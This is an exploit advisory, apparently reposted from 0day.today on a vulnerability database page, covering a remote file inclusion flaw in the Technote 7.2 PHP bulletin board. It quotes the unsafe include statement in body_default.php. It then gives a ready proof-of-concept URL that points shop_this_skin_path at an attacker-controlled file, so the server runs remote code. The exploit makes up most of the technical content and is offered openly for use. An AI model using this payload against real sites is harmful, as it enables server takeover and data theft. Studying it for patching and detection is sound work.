Lucene search
Technote 7.2 Remote File Inclusion Vulnerability
Remote File Inclusion Vulnerability in Technote 7.
Show more
================================================
Technote 7.2 Remote File Inclusion Vulnerability
================================================
/*************************
TECHNOTE (VERSION 7.2 (08.09.25))is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.
Here is the details:
**************************/
TEST ON VERSION TECHNOTE 7.2 (08.09.25)
Download : http://www.technote.co.kr/
/***************************
Remote File Inclusion Vulnerability
/body_default.php
if($GOODS['gs_input']) include "$shop_this_skin_path/2_view_body/include/form_option.php";
//File Include
*************************/
poc:
http://[site]/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]
# 0day.today [2018-04-08] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo03 Feb 2009 00:00Current
7.1High risk
Vulners AI Score7.1